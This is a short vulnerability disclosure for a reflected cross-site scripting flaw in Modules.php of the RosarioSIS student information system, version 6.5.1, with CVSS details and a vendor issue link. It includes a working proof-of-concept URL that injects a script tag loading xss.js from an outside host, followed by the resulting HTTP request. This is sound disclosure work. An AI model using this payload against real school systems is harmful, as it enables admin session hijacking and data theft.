Reflected Cross-Site Scripting vulnerability
Cross-Site Scripting vulnerability in RosarioSIS Student Information System allows remote attackers to execute arbitrary web script. The exploitation of this issue can lead to admin session hijacking or executing arbitrary requests using the admin's session.
Plugin | README |
---|---|
Vulnerability type: | Cross-Site Scripting vulnerability (XSS) |
Vendor of the product(s): | RosarioSIS |
Affected product(s)/code base: | Tested on version 6.5.1 |
Has vendor confirmed or acknowledged the vulnerability: | Yes |
Attack type: | Reflected XSS |
Impact & Description: | C:L/I:L/A:N |
Affected component: | Modules.php |
Attack vector(s): | Remote |
Proof of concept (PoC): | Details below |
Reference(s): | https://github.com/francoisjacquet/rosariosis/issues/260 |
CVSS v3.1 details: | AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N |
Notes:
# PoC
http://RosarioSIS.edu/Modules.php?modname=School_Setup/Rollover.php&%22%3E%3CSCRIPT/SRC=%27http://vuln.com/xss.js%27;%3C/script%3E=1
# vuln.com gets this requests for xss.js
GET /xss.js HTTP/1.1
Host: RosarioSIS.edu
User-Agent: Mozilla/5.0 (Win)
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://RosarioSIS.edu/Modules.php?modname=School_Setup/Rollover.php&%22%3E%3CSCRIPT/SRC=%27http://vuln.com/xss.js%27;%3C/script%3E=1